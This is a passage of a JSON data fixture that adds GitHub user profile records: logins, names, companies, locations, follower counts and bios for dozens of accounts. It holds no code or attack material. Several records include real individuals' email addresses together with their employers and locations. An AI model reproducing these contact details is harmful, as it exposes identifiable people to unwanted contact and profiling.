"2024-09-11T23:22:48.424Z", + "nest_updated_at": "2024-09-22T18:46:15.284Z", + "name": "Keith Zantow", + "login": "kzantow", + "email": "keith@zantow.us", + "avatar_url": "https://avatars.githubusercontent.com/u/3009477?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 54, + "public_gists_count": 3, + "public_repositories_count": 29, + "created_at": "2012-12-10T17:12:11Z", + "updated_at": "2024-04-11T03:14:39Z", + "node_id": "MDQ6VXNlcjMwMDk0Nzc=", + "bio": "I help build fast, pretty things! ... or is it pretty things, fast?", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1359, + "fields": { + "nest_created_at": "2024-09-11T23:22:50.115Z", + "nest_updated_at": "2024-09-11T23:22:50.115Z", + "name": "Dario Andreani", + "login": "darioandre", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/77160283?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-01-08T14:46:12Z", + "updated_at": "2024-08-27T10:35:58Z", + "node_id": "MDQ6VXNlcjc3MTYwMjgz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1360, + "fields": { + "nest_created_at": "2024-09-11T23:23:15.261Z", + "nest_updated_at": "2024-09-11T23:23:15.261Z", + "name": "I Putu Ariyasa", + "login": "rucciva", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4647473?v=4", + "company": "PT. Telekomunikasi Indonesia", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 45, + "created_at": "2013-06-08T11:16:32Z", + "updated_at": "2024-09-07T02:24:24Z", + "node_id": "MDQ6VXNlcjQ2NDc0NzM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1361, + "fields": { + "nest_created_at": "2024-09-11T23:23:16.953Z", + "nest_updated_at": "2024-09-11T23:23:16.953Z", + "name": "jeroendee", + "login": "jeroendee", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/220023?v=4", + "company": "Quality Shepherd", + "location": "Amsterdam", + "collaborators_count": 0, + "following_count": 25, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2010-03-10T18:45:13Z", + "updated_at": "2024-08-21T09:44:54Z", + "node_id": "MDQ6VXNlcjIyMDAyMw==", + "bio": "", + "is_hireable": false, + "twitter_username": "jeroendee" + } +}, +{ + "model": "github.user", + "pk": 1362, + "fields": { + "nest_created_at": "2024-09-11T23:23:19.870Z", + "nest_updated_at": "2024-09-11T23:24:48.321Z", + "name": "Lunzi1992", + "login": "monkeylijin", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/26971206?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2017-04-06T15:14:52Z", + "updated_at": "2024-08-30T00:38:07Z", + "node_id": "MDQ6VXNlcjI2OTcxMjA2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1363, + "fields": { + "nest_created_at": "2024-09-11T23:23:20.711Z", + "nest_updated_at": "2024-09-11T23:23:20.711Z", + "name": "", + "login": "CameronGo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/14074983?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2015-09-01T13:52:37Z", + "updated_at": "2024-09-03T13:46:12Z", + "node_id": "MDQ6VXNlcjE0MDc0OTgz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1364, + "fields": { + "nest_created_at": "2024-09-11T23:23:21.924Z", + "nest_updated_at": "2024-09-11T23:23:21.924Z", + "name": "", + "login": "alex1891", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/22732183?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2016-10-09T19:38:27Z", + "updated_at": "2024-06-12T09:14:53Z", + "node_id": "MDQ6VXNlcjIyNzMyMTgz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1365, + "fields": { + "nest_created_at": "2024-09-11T23:23:22.728Z", + "nest_updated_at": "2024-09-12T02:08:28.850Z", + "name": "Juris Lambda", + "login": "jxlambda", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/61850441?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2020-03-05T21:19:09Z", + "updated_at": "2024-09-02T07:39:10Z", + "node_id": "MDQ6VXNlcjYxODUwNDQx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1366, + "fields": { + "nest_created_at": "2024-09-11T23:23:23.545Z", + "nest_updated_at": "2024-09-11T23:23:23.545Z", + "name": "", + "login": "emacampolo", + "email": "emanuel.campolo@mercadolibre.com", + "avatar_url": "https://avatars.githubusercontent.com/u/43819854?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 18, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2018-10-03T14:57:34Z", + "updated_at": "2024-08-22T21:52:53Z", + "node_id": "MDQ6VXNlcjQzODE5ODU0", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1367, + "fields": { + "nest_created_at": "2024-09-11T23:23:24.379Z", + "nest_updated_at": "2024-09-11T23:23:24.379Z", + "name": "Sven", + "login": "svenschwermer", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7867606?v=4", + "company": "@disruptive-technologies ", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 57, + "created_at": "2014-06-12T06:50:30Z", + "updated_at": "2024-08-09T11:57:23Z", + "node_id": "MDQ6VXNlcjc4Njc2MDY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1368, + "fields": { + "nest_created_at": "2024-09-11T23:23:25.176Z", + "nest_updated_at": "2024-09-11T23:23:25.176Z", + "name": "", + "login": "victorc-cylus", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/155533262?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-01-03T09:52:02Z", + "updated_at": "2024-01-03T09:52:02Z", + "node_id": "U_kgDOCUU_zg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1369, + "fields": { + "nest_created_at": "2024-09-11T23:23:26.418Z", + "nest_updated_at": "2024-09-11T23:23:26.418Z", + "name": "Suvarna", + "login": "super3programmer", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/53504717?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2019-07-31T04:14:03Z", + "updated_at": "2024-09-11T08:36:13Z", + "node_id": "MDQ6VXNlcjUzNTA0NzE3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1370, + "fields": { + "nest_created_at": "2024-09-11T23:23:27.641Z", + "nest_updated_at": "2024-09-14T19:27:15.459Z", + "name": "Skripka Andrey", + "login": "andriiskripka", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/14906847?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 6, + "created_at": "2015-09-30T12:43:38Z", + "updated_at": "2024-08-29T09:57:51Z", + "node_id": "MDQ6VXNlcjE0OTA2ODQ3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1371, + "fields": { + "nest_created_at": "2024-09-11T23:23:28.461Z", + "nest_updated_at": "2024-09-22T18:46:20.004Z", + "name": "", + "login": "shusriva", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/35764437?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2018-01-24T10:31:50Z", + "updated_at": "2024-08-12T15:28:06Z", + "node_id": "MDQ6VXNlcjM1NzY0NDM3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1372, + "fields": { + "nest_created_at": "2024-09-11T23:24:05.599Z", + "nest_updated_at": "2024-09-11T23:24:05.599Z", + "name": "Adam Hošek", + "login": "mamuf", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/382484?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2010-08-31T20:16:35Z", + "updated_at": "2024-03-21T10:19:27Z", + "node_id": "MDQ6VXNlcjM4MjQ4NA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1373, + "fields": { + "nest_created_at": "2024-09-11T23:24:06.462Z", + "nest_updated_at": "2024-09-11T23:24:06.462Z", + "name": "Justin Rogers", + "login": "kuporific", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4064195?v=4", + "company": "Verato", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 2, + "public_repositories_count": 7, + "created_at": "2013-04-05T00:27:39Z", + "updated_at": "2023-10-27T17:38:30Z", + "node_id": "MDQ6VXNlcjQwNjQxOTU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1374, + "fields": { + "nest_created_at": "2024-09-11T23:24:08.262Z", + "nest_updated_at": "2024-09-11T23:24:08.262Z", + "name": "", + "login": "midav7", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/40424976?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2018-06-20T09:27:25Z", + "updated_at": "2023-12-28T17:10:32Z", + "node_id": "MDQ6VXNlcjQwNDI0OTc2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1375, + "fields": { + "nest_created_at": "2024-09-11T23:24:09.137Z", + "nest_updated_at": "2024-09-11T23:24:09.137Z", + "name": "", + "login": "ollieSayer", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/26251421?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2017-03-07T13:22:23Z", + "updated_at": "2024-04-15T07:38:23Z", + "node_id": "MDQ6VXNlcjI2MjUxNDIx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1376, + "fields": { + "nest_created_at": "2024-09-11T23:24:09.954Z", + "nest_updated_at": "2024-09-11T23:24:09.954Z", + "name": "Jörn Gebhardt", + "login": "gebhardt", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1846035?v=4", + "company": "", + "location": "Weingarten, Germany", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2012-06-13T10:29:36Z", + "updated_at": "2024-09-04T08:49:52Z", + "node_id": "MDQ6VXNlcjE4NDYwMzU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1377, + "fields": { + "nest_created_at": "2024-09-11T23:24:10.790Z", + "nest_updated_at": "2024-09-11T23:24:10.790Z", + "name": "", + "login": "relnah", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6702680?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2014-02-17T08:23:48Z", + "updated_at": "2024-05-21T14:36:01Z", + "node_id": "MDQ6VXNlcjY3MDI2ODA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1378, + "fields": { + "nest_created_at": "2024-09-11T23:24:11.594Z", + "nest_updated_at": "2024-09-22T19:42:07.422Z", + "name": "", + "login": "malice00", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12972577?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2015-06-19T22:14:41Z", + "updated_at": "2024-06-17T20:09:30Z", + "node_id": "MDQ6VXNlcjEyOTcyNTc3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1379, + "fields": { + "nest_created_at": "2024-09-11T23:24:12.871Z", + "nest_updated_at": "2024-09-11T23:24:12.871Z", + "name": "Tarun Anand", + "login": "tr0nand", + "email": "anandtarun2@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/22257379?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 24, + "created_at": "2016-09-17T13:16:29Z", + "updated_at": "2024-08-29T18:00:26Z", + "node_id": "MDQ6VXNlcjIyMjU3Mzc5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1380, + "fields": { + "nest_created_at": "2024-09-11T23:24:13.722Z", + "nest_updated_at": "2024-09-22T19:42:34.881Z", + "name": "Drew Thompson", + "login": "officerNordberg", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/901470?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2011-07-07T20:33:42Z", + "updated_at": "2024-07-25T16:28:00Z", + "node_id": "MDQ6VXNlcjkwMTQ3MA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1381, + "fields": { + "nest_created_at": "2024-09-11T23:24:14.544Z", + "nest_updated_at": "2024-09-11T23:24:14.544Z", + "name": "Ivo Hedtke", + "login": "hedtke", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/726611?v=4", + "company": "DB Schenker @dbschenker ", + "location": "Essen, Germany", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 8, + "public_gists_count": 1, + "public_repositories_count": 7, + "created_at": "2011-04-13T08:54:48Z", + "updated_at": "2024-08-13T15:28:27Z", + "node_id": "MDQ6VXNlcjcyNjYxMQ==", + "bio": "Head of Operations Research", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1382, + "fields": { + "nest_created_at": "2024-09-11T23:24:15.383Z", + "nest_updated_at": "2024-09-22T19:42:12.284Z", + "name": "Leif Lislegård", + "login": "lislei", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13136714?v=4", + "company": "Statens Kartverk ", + "location": "Hønefoss, Norway", + "collaborators_count": 0, + "following_count": 20, + "followers_count": 4, + "public_gists_count": 1, + "public_repositories_count": 15, + "created_at": "2015-07-01T14:29:54Z", + "updated_at": "2024-08-22T08:39:43Z", + "node_id": "MDQ6VXNlcjEzMTM2NzE0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1383, + "fields": { + "nest_created_at": "2024-09-11T23:24:16.249Z", + "nest_updated_at": "2024-09-12T01:27:12.765Z", + "name": "bovy89", + "login": "bovy89", + "email": "bovy89@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/697408?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 31, + "created_at": "2011-03-29T14:33:31Z", + "updated_at": "2024-05-17T12:23:58Z", + "node_id": "MDQ6VXNlcjY5NzQwOA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1384, + "fields": { + "nest_created_at": "2024-09-11T23:24:17.089Z", + "nest_updated_at": "2024-09-11T23:24:17.089Z", + "name": "Ronan Browne", + "login": "ronanbrowne", + "email": "ronanbrowne88@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5963044?v=4", + "company": "R3", + "location": "Dublin / Galway", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 32, + "created_at": "2013-11-17T20:40:43Z", + "updated_at": "2024-09-04T11:23:40Z", + "node_id": "MDQ6VXNlcjU5NjMwNDQ=", + "bio": "DevOps Engineering Manager and Team Lead at R3. \r\n\r\n ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1385, + "fields": { + "nest_created_at": "2024-09-11T23:24:17.913Z", + "nest_updated_at": "2024-09-11T23:24:17.913Z", + "name": "", + "login": "AnonymousVovus", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1920918?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2012-07-04T06:23:02Z", + "updated_at": "2023-04-17T10:31:42Z", + "node_id": "MDQ6VXNlcjE5MjA5MTg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1386, + "fields": { + "nest_created_at": "2024-09-11T23:24:18.745Z", + "nest_updated_at": "2024-09-11T23:42:17.326Z", + "name": "", + "login": "spliffone", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12686268?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2015-05-31T18:55:27Z", + "updated_at": "2024-08-20T18:08:26Z", + "node_id": "MDQ6VXNlcjEyNjg2MjY4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1387, + "fields": { + "nest_created_at": "2024-09-11T23:24:22.574Z", + "nest_updated_at": "2024-09-22T18:46:36.945Z", + "name": "PJ Fanning", + "login": "pjfanning", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11783444?v=4", + "company": "", + "location": "Kilkenny, Ireland", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 161, + "public_gists_count": 0, + "public_repositories_count": 350, + "created_at": "2015-04-03T08:56:14Z", + "updated_at": "2024-09-20T17:18:27Z", + "node_id": "MDQ6VXNlcjExNzgzNDQ0", + "bio": "Experienced developer with an interest in open source. Member of Apache Software Foundation.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1388, + "fields": { + "nest_created_at": "2024-09-11T23:24:23.404Z", + "nest_updated_at": "2024-09-11T23:24:23.404Z", + "name": "Tim van der Lippe", + "login": "TimvdLippe", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5948271?v=4", + "company": "Adyen", + "location": "The Netherlands", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 276, + "public_gists_count": 6, + "public_repositories_count": 180, + "created_at": "2013-11-15T13:40:59Z", + "updated_at": "2024-08-22T11:32:45Z", + "node_id": "MDQ6VXNlcjU5NDgyNzE=", + "bio": "@Mockito core developer,\r\n\r\nDevelopment tooling engineer @Adyen,\r\n\r\nex-Googler worked on @ChromeDevTools, @Polymer intern,\r\n\r\nopen source enthusiast", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1389, + "fields": { + "nest_created_at": "2024-09-11T23:24:25.115Z", + "nest_updated_at": "2024-09-11T23:24:25.115Z", + "name": "", + "login": "fxigit", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/113127774?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-09-08T16:10:34Z", + "updated_at": "2022-09-08T16:10:34Z", + "node_id": "U_kgDOBr4xXg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1390, + "fields": { + "nest_created_at": "2024-09-11T23:24:25.923Z", + "nest_updated_at": "2024-09-11T23:24:25.923Z", + "name": "Markus Duft", + "login": "mduft", + "email": "markus.duft@ssi-schaefer.com", + "avatar_url": "https://avatars.githubusercontent.com/u/533793?v=4", + "company": "SSI Schaefer IT Solutions GmbH", + "location": "Friesach bei Graz, Austria", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 14, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2010-12-22T20:54:55Z", + "updated_at": "2024-08-28T09:17:46Z", + "node_id": "MDQ6VXNlcjUzMzc5Mw==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1391, + "fields": { + "nest_created_at": "2024-09-11T23:24:26.746Z", + "nest_updated_at": "2024-09-12T01:29:16.115Z", + "name": "", + "login": "taicomjp", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3759726?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2013-03-04T01:32:59Z", + "updated_at": "2024-09-05T07:27:18Z", + "node_id": "MDQ6VXNlcjM3NTk3MjY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1392, + "fields": { + "nest_created_at": "2024-09-11T23:24:29.210Z", + "nest_updated_at": "2024-09-11T23:24:29.210Z", + "name": "", + "login": "xiang123abc", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/36296072?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2018-02-09T09:53:42Z", + "updated_at": "2024-07-12T05:49:10Z", + "node_id": "MDQ6VXNlcjM2Mjk2MDcy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1393, + "fields": { + "nest_created_at": "2024-09-11T23:24:30.047Z", + "nest_updated_at": "2024-09-11T23:24:30.047Z", + "name": "Edward van Raak", + "login": "EdwardvanRaak", + "email": "edward.vanraak@nedap.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1560465?v=4", + "company": "Nedap", + "location": "Netherlands", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 16, + "public_gists_count": 6, + "public_repositories_count": 10, + "created_at": "2012-03-21T10:20:15Z", + "updated_at": "2024-08-30T11:41:49Z", + "node_id": "MDQ6VXNlcjE1NjA0NjU=", + "bio": "Android Developer \r\n\r\n@ Nedap Healthcare", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1394, + "fields": { + "nest_created_at": "2024-09-11T23:24:31.286Z", + "nest_updated_at": "2024-09-11T23:24:31.286Z", + "name": "Allen Fisher", + "login": "allenfisher", + "email": "allen.fisher@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1399385?v=4", + "company": "Stelligent", + "location": "California", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 18, + "public_gists_count": 3, + "public_repositories_count": 3, + "created_at": "2012-02-01T20:34:28Z", + "updated_at": "2023-10-02T15:57:42Z", + "node_id": "MDQ6VXNlcjEzOTkzODU=", + "bio": " CI and DevOps Engineer. I make it go automagically. If you can do it more than once, I can automate it.", + "is_hireable": false, + "twitter_username": "allen_fisher" + } +}, +{ + "model": "github.user", + "pk": 1395, + "fields": { + "nest_created_at": "2024-09-11T23:24:32.107Z", + "nest_updated_at": "2024-09-11T23:24:32.107Z", + "name": "BonusLord", + "login": "BonusLord", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5925424?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 1, + "public_repositories_count": 3, + "created_at": "2013-11-13T03:11:36Z", + "updated_at": "2024-07-24T00:12:56Z", + "node_id": "MDQ6VXNlcjU5MjU0MjQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1396, + "fields": { + "nest_created_at": "2024-09-11T23:24:32.956Z", + "nest_updated_at": "2024-09-11T23:24:32.956Z", + "name": "言小川", + "login": "yanxiaochuan", + "email": "993496032@qq.com", + "avatar_url": "https://avatars.githubusercontent.com/u/7532142?v=4", + "company": "", + "location": "霸都", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2014-05-09T08:42:54Z", + "updated_at": "2024-08-13T13:21:51Z", + "node_id": "MDQ6VXNlcjc1MzIxNDI=", + "bio": "夫君子之行,静以修身,俭以养德。非淡泊无以明志,非宁静无以致远", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1397, + "fields": { + "nest_created_at": "2024-09-11T23:24:33.761Z", + "nest_updated_at": "2024-09-11T23:24:33.761Z", + "name": "Alexander Dietzsch", + "login": "dietzsch", + "email": "alexander.dietzsch@de.bosch.com", + "avatar_url": "https://avatars.githubusercontent.com/u/7125386?v=4", + "company": "Robert Bosch GmbH", + "location": "Stuttgart", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2014-04-01T09:41:38Z", + "updated_at": "2024-06-20T07:58:55Z", + "node_id": "MDQ6VXNlcjcxMjUzODY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1398, + "fields": { + "nest_created_at": "2024-09-11T23:24:34.610Z", + "nest_updated_at": "2024-09-11T23:24:34.610Z", + "name": "Devin Smith", + "login": "devinrsmith", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6764691?v=4", + "company": "Deephaven Data Labs", + "location": "", + "collaborators_count": 0, + "following_count": 38, + "followers_count": 24, + "public_gists_count": 25, + "public_repositories_count": 132, + "created_at": "2014-02-23T18:53:26Z", + "updated_at": "2024-09-06T03:48:20Z", + "node_id": "MDQ6VXNlcjY3NjQ2OTE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1399, + "fields": { + "nest_created_at": "2024-09-11T23:24:35.432Z", + "nest_updated_at": "2024-09-11T23:24:35.432Z", + "name": "Matija Vrbovšek", + "login": "mindhacker42", + "email": "matija.vrbovsek@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1517773?v=4", + "company": "Kamino d.o.o.", + "location": "Maribor, Slovenia", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2012-03-08T20:57:45Z", + "updated_at": "2024-02-19T17:02:59Z", + "node_id": "MDQ6VXNlcjE1MTc3NzM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1400, + "fields": { + "nest_created_at": "2024-09-11T23:24:37.871Z", + "nest_updated_at": "2024-09-11T23:24:37.871Z", + "name": "Sam Gammon", + "login": "sgammon", + "email": "sam@elide.dev", + "avatar_url": "https://avatars.githubusercontent.com/u/171897?v=4", + "company": "@elide-dev / @buildless", + "location": "San Francisco, California", + "collaborators_count": 0, + "following_count": 661, + "followers_count": 163, + "public_gists_count": 79, + "public_repositories_count": 274, + "created_at": "2009-12-24T21:58:12Z", + "updated_at": "2024-06-24T23:50:44Z", + "node_id": "MDQ6VXNlcjE3MTg5Nw==", + "bio": "", + "is_hireable": false, + "twitter_username": "elide_sg" + } +}, +{ + "model": "github.user", + "pk": 1401, + "fields": { + "nest_created_at": "2024-09-11T23:24:39.077Z", + "nest_updated_at": "2024-09-12T01:29:01.929Z", + "name": "Suraj Rk ", + "login": "tech-surajrk", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/112088960?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-08-25T12:25:44Z", + "updated_at": "2024-03-01T14:59:16Z", + "node_id": "U_kgDOBq5XgA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1402, + "fields": { + "nest_created_at": "2024-09-11T23:24:39.894Z", + "nest_updated_at": "2024-09-11T23:24:39.894Z", + "name": "", + "login": "TheoLassonder", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/756274?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2011-04-28T06:04:47Z", + "updated_at": "2024-07-24T08:03:16Z", + "node_id": "MDQ6VXNlcjc1NjI3NA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1403, + "fields": { + "nest_created_at": "2024-09-11T23:24:41.589Z", + "nest_updated_at": "2024-09-11T23:24:41.589Z", + "name": "", + "login": 